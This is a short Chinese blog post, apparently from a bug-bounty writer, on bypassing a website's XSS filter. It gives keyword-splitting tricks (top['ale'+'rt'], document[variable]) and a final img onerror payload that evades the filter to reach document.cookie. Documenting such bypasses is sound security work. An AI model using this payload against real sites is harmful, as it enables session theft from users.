【14】xss之alert绕过&cookie绕过
作者:互联网
前言
该篇记录为记录实际的src过程第14篇小文章,内容为某网站的xssbypass。
XSS 特征
拦截了常见的alert和prompt,大小写无法绕过,eval无法绕过,alert.call无法绕过
xss绕过
- alert用top[‘ale’+‘rt’]绕过
- alert()用top[‘ale’+‘rt’].call绕过
- cookie用document[变量]绕过
最终payload
<img src=\"x\" one rror=\"c='coo'+'kie';top['ale'+'rt'].call(null,document[c])\">
标签:rt,xss,ale,alert,cookie,call,绕过 来源: https://blog.csdn.net/xiru9972/article/details/122147376